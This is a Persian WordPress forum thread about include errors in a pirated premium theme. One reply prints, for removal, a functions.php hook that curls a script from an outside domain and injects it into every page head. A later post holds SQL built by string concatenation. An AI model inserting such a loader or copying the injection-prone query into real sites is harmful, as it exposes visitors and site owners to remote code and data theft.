mohammad533

دو مشکل خیلی جدی در پوسته مجله ای فارسی آر اس

11 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام میشه بگین این ارور هارو چه جوری برطرف کنم

هم رو وردپرس 5.2

و هم رو 4.2

امتحانش کردم

اینم رور ها

Warning: include_once(C:\wamp\www\wordpress/wp-content/themes/ares/templates/template-blog-.php) [function.include-once]: failed to open stream: No such file or directory in C:\wamp\www\wordpress\wp-content\themes\ares\index.php on line 72

Warning: include_once() [function.include]: Failed opening ‘C:\wamp\www\wordpress/wp-content/themes/ares/templates/template-blog-.php’ for inclusion (include_path=’.;C:\php5\pear’) in C:\wamp\www\wordpress\wp-content\themes\ares\index.php on line 72

اینم لینک قالب

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

پس از نصب ابتدا به فایل function.php برین و این خطوط رو پاک کنین (قبلش حتما بک آپ بگیرین)

**/if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} 

در ضمن از آخرین نسخه ورد پرس استفاده کنید

ویرایش شده در توسط mahdihunter
0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

بازم نشد!!!

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

سلام

بازم نشد!!!

برای استفاده از لوکال هاست از XAMPP استفاده کنید احتمالا مشکلتون حل بشه

قالب رو رو لوکال و همچنین هاستم تست کردم مشکلی نداشت

0

به اشتراک گذاری این پست


لینک به پست

دوست من خوب سایت را خوانده اید؟


این نسخه روی وردپرس 3.5 دارای ی سری اشکالات هست

بعد هم فکر کنم قالب پولی است.برای همین چون حقوق نویسنده را زیر پای می گذارد ، پشتیبانی هم نمی شود.

1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

من رو وردپرس 4.2 رو هم امتحان کردم نشد؟؟؟

مشکلش هم فکر کنم توی این خطه

include_once (TEMPLATEPATH . "/bashgahegraphic".$pp_blog_layout.".php");

این رور ها مال فایل index.php است این فایلش کاملش

<?php
<?php
/**
* The main template file.
*
* @package WordPress
*/

get_header();

$pp_slider_timer = get_option('pp_slider_timer');
if(empty($pp_slider_timer))
{
$pp_slider_timer = 5;
}

// Get featured posts
$pp_featured_cat = get_option('pp_featured_cat');
$pp_home_display_slide = TRUE;
$featured_posts_arr = array();

if(isset($_SESSION['pp_menu_style']))
{
$pp_menu_style = $_SESSION['pp_menu_style'];
}
else
{
$pp_menu_style = get_option('pp_menu_style');
}

?>

<input type="hidden" id="slider_timer" name="slider_timer" value="<?php echo $pp_slider_timer; ?>"/>

<br class="clear"/>

<div id="content_wrapper">

<div class="inner">

<!-- Begin main content -->
<div class="inner_wrapper">

<?php
if($pp_menu_style != 4 && $pp_menu_style != 5 && $pp_menu_style != 6)
{
include_once (TEMPLATEPATH . "/templates/template-slide-1.php");
}
else
{
include_once (TEMPLATEPATH . "/templates/template-slide-2.php");
?>

<div class="sidebar_content">

<?php
}
?>

<?php

global $more; $more = false; # some wordpress wtf logic

if(isset($_SESSION['pp_blog_layout']))
{
$pp_blog_layout = $_SESSION['pp_blog_layout'];
}
else
{
$pp_blog_layout = get_option('pp_blog_layout');
}

include_once (TEMPLATEPATH . "/bashgahegraphic".$pp_blog_layout.".php");

if($pp_menu_style == 4 OR $pp_menu_style == 5 OR $pp_menu_style == 6)
{
?>
</div>
<?php
}
else
{
?>
</div>
</div>
<?php
}
?>

<div class="sidebar_wrapper">
<?php
$twitter_id = get_option(SHORTNAME.'_twitter_username');
$fb_id = get_option('pp_feedburner_id');

if(!empty($twitter_id) OR !empty($fb_id)):
?>
<div class="social_profile">
<div class="profile">
<a href="<?php echo $fb_id; ?>">
<img src="<?php echo get_stylesheet_directory_uri(); ?>/images/social_feeds.png" alt="" class="alignleft social"/>
</a>
<h4><?php pp_feeds_count(); ?></h4>
<span class="count">subscribers</span>
</div>

<div class="profile">
<a href="http://twitter.com/<?php echo $twitter_id; ?>">
<img src="<?php echo get_stylesheet_directory_uri(); ?>/images/social_twitter.png" alt="" class="alignleft social"/>
</a>
<h4><?php pp_twitter_followers(); ?></h4>
<span class="count">followers</span>
</div>

<br class="clear"/>
</div>
<?php
endif;
?>

<div class="ads125_wrapper">
<?php
$pp_side_banner = get_option('pp_side_banner');

if(!empty($pp_side_banner))
{
echo stripslashes($pp_side_banner);
}
?>
</div>

<div class="sidebar">

<div class="content">

<ul class="sidebar_widget">
<?php dynamic_sidebar('Home Sidebar'); ?>
</ul>

</div>

</div>
<br class="clear"/>

</div>

<br class="clear"/>
</div>
<!-- End main content -->

</div>

</div>

<?php get_footer(); ?>
<?php get_footer(); ?>

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

دوست من خوب سایت را خوانده اید؟


این نسخه روی وردپرس 3.5 دارای ی سری اشکالات هست

بعد هم فکر کنم قالب پولی است.برای همین چون حقوق نویسنده را زیر پای می گذارد ، پشتیبانی هم نمی شود.

پوسته پرمیوم هست؟
1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

بله

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

بله

بحث در مورد قالبهای غیر رایگان ممنوع است قوانین را بخوانید

0

به اشتراک گذاری این پست


لینک به پست

اما این قالب رایگانه به صورت رایگان دانلود شده لینک دانلود رایگان بالا هستش!!!!!!

0

به اشتراک گذاری این پست


لینک به پست

پوسته پرمیوم هست؟

بله

در هر حال مراحل نصبش را درست اجرا کنید قالب مشکلی ندارد

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط amirsa
      سلام
      من محصولات متغیر رو در ووکامرس که وارد میکنم،(محصول ممکنه 2 یا 3 صفت داره که باید انتخاب بشه)
       توی فروشگاه ووکامرس بصورت حد اقل و حداکثر قیمت ها نشون داده میشه
      مثلا کالا دونوع 10 و  20 تومانی هست.صفت آ 15 تومن برای مشتری هایی که بخوان.تو فروشگاه قیمت رو بصورت 10-35 نشون میده که بیشتر از قیمت اصلی است.من میخوام همون 10 و 20 رو نشون بده
      این مشکل انرژی زیادی ازم گرفته ممنون میشم راهنماییم کنید 
    • توسط arianemun
      سلام عرض ادب به کاربران وردپرس پارسی ، من یک مشکلی دارم در افزونه ای ، افزونه woocomerce product finder یک افزونه ای است طبق تنظیمات و چیز هایی که برای محصول ووکامرسی تعریف میکنیم با انتخواب گزینه ها توسط کاربر محصول مورد نظر خودش رو پیدا میکنه، تنها مشکلی که این افزونه یا میشه گفت ضعفی که داره تفاوت محصول برجسته رو با محصول ساده متوجه نمیشه یعنی اگر تو اون دسته یک محصول برجسته باشه و یک محصول ساده اون ها رو از هم تفکیک نمیکنه من میخواستم این قابلیت رو به این افزونه اضافه کنم که کاربر وقتی محصولش رو پیدا کرد هم محصول ساده ها رو ببینه و محصول برجسته شده ! ممنون میشم کمک کنید .
       
      لینک افزونه استفاده شده
    • توسط صالح طالبی
      باسلام خدمت شما عزیزان
      بنده این تکه کد رو که در اصل افزونه نمایش آخرین های انجمن بود برای وردپرس به صورت کد در خود فانکشن قالب دراوردم:
      function ipslatest_main($query) { if ( is_home() && $query->is_main_query() ) { $db_user = 'root'; $db_name = 'ipsdb'; $db_pass = ''; $db_host = 'localhost'; $prefix = get_option('ipslatest_db_prefix'); $url = 'http://localhost/IPS'; $limit = '5'; $title = ''; $width = '300'; $direction = 'rtl'; $translations = array('عنوان','بازدید','پاسخ ها','ارسال شده به وسیله'); $db = new wpdb( $db_user, $db_pass, $db_name,$db_host ); $q = $db->get_results( 'SELECT topic_id,author_name FROM '.$prefix.'forums_posts ORDER BY pid DESC LIMIT '.$limit ); echo '<div id="ipslatest-mainTitle" style="width:'.$width.'">'.$title.$position.'</div>'; echo '<table id="ipslatestTopics" border=0 style="padding:10px;width:'.$width.'">'; echo '<tr><td class="ipslatest-row-views">'.$translations[2].'</td><td class="ipslatest-row-answers">'.$translations[1].'</td><td class="ipslatest-row-sender">'.$translations[3].'</td><td class="ipslatest-row-title">'.$translations[0].'</td> </tr>'; if (is_array($q) || is_object($q)) { foreach ($q as $key => $row) { $topicDetails = $db->get_row('SELECT title,tid,views,posts FROM '.$prefix.'forums_topics WHERE tid='.$row->topic_id); $userMemberID = $db->get_row('SELECT member_group_id FROM '.$prefix."core_members WHERE name='".$row->author_name."'"); $userShowingData = $db->get_row('SELECT prefix,suffix FROM core_groups WHERE g_id='.$userMemberID->member_group_id); echo '<tr id="ipstopic"> <td class="ipslatest-row-views-content"> <span>'.$topicDetails->views.' </span></td> <td class="ipslatest-row-answers-content"><span>'.$topicDetails->posts.'</span></td> <td id="ipslatest-row-sender-content">'.$userShowingData->prefix.$row->author_name.$userShowingData->suffix.'</td> <td class="ipsTitle"> <a rel="follow" href="'.$url.'topic/'.$topicDetails->tid.'-'.strtolower(str_replace(" ","-",$topicDetails->title)).'">'. strip_tags($topicDetails->title) .' </a> </td> </tr>'; } /*}*/ } echo '</table>'; } } به صورت خودکار خود افزونه از کد زیر برای نمایش اون در اول پست های سایت و یا در آخر پست های سایت استفاده میکنه کد ها هم به این شکله:
      add_action( 'wp', 'ipslatestMain' ); function ipslatestMain( $query ) { $position = "bottom"; if($position === "bottom") $acton = "loop_end"; elseif ($position === "top") $acton = "loop_start"; add_action($acton,"ipslatest_main"); } الان بدون هیچ مشکلی نمایش میده در پایین پست ها ولی من میخام این نمایش رو در یه قسمت دیگه از قالب انجام بدم و چجوری میتونم این فانکشن و تابع رو نمایش بدم؟؟؟
      نام افزونه هم در ضمن ipsuite-latest-topics هست و من از حالت افزونه فقط خارجش کردم و در خود قالب و فانکشن اون اوکی کردم.
      فقط مشکل اینه که نمیخام در بالای پست یا پایین پست ها نمایش بدم و میخام در جایی که خودم تعیین میکنم تابع رو نمایش بدم؟!!!
      ممنون میشم راهنمایی بفرمایید.
    • توسط سعید فرزادی پور
      با عرض سلام
      من به مشکلی خوردم که راه حل اون رو نمیدونم
      در هدر سایت یک نویگیشن بار دارم که منوی اصلی سایتم به صورت دراپ داون در این نویگیشن بار وجود داره ، قال سایت من shaply هستش و استفاده از ویجت ها در body بازه ، من با استفاده از یک ویجت اسلایدر در بالاترین قسمت و زیر هدر سایت که ارتفاع اونم 55 پیکسل هستش اسلایدر بزرگ ایجاد کردم ، و حالا زمانی که میرم روی دراپ داون ها متاسفانه تا قبل از اسکرول کردن به پایین ، زیر منو ها به زیر اسلایدر میرن ، اما بعد از اسکرول کردن به پایین این مشکل حل شده و منو ها و زیر منو ها نمایش داده میشن ، هرچه z-index رو افزایش دادم نتیجه ای نداشت ، چطور میتونم این مشکل رو حل کنم ؟
      و سوال دوم این که در این تم منو ها اول به پایین و بعد به راست باز میشن و من میخوایم سایت رو به صورت فارسی داشته باشم و میخوام اول به پایین و بعد به چپ باز بشن منو ها , چه تغییری میتونم در css ایجاد کنم ؟
    • توسط mrasoul
      اینکه من بخوام به قالبی که خریدم یه صفحه ایی رو اضافه کنم میشه بحث غیر قانونی که بایگانیش می کنید ؟
      اگه یک قالبی که میخرید یه امکانی و نداشته باشه و شما بخوای بهش اضافه کنی حتما باید بری پیش پشتیبان قالب و هزینه کنی برات بهش اضافه کنه؟ خوب اگه میتونست که اضافه می کرد .